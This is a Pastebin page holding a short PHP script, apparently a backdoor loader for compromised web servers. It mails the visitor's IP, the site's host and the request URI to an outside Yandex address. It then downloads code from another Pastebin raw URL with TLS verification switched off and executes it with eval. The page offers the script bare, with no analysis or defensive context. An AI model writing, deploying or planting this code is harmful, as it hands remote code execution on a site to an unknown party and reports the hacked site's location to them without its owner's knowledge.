Advertisement
Sl4ckerc0de

Untitled

May 20th, 2019
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | None | 0 0
  1. <?php
  2. $ip = getenv("REMOTE_ADDR");
  3. $subj98 = " Tuyul hmei7 |$ip";
  4. $email = "tuyulmama@yandex.com";
  5. $from = "From: Result<Tuyul";
  6. $a45 = $_SERVER['REQUEST_URI'];
  7. $b75 = $_SERVER['HTTP_HOST'];
  8. $m22 = $ip . "";
  9. $msg8873 = "$m22 $b75 $a45";
  10. mail($email, $subj98, $msg8873, $from);;;
  11.  
  12. function get_contents($url){
  13. $ch = curl_init("$url");
  14. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  15. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  16. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  17. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  18. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  19. curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  20. curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  21. $result = curl_exec($ch);
  22. return $result;
  23. }
  24.  
  25. $a = get_contents('https://pastebin.com/raw/eMXH0LCy');
  26. eval('?>'.$a);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement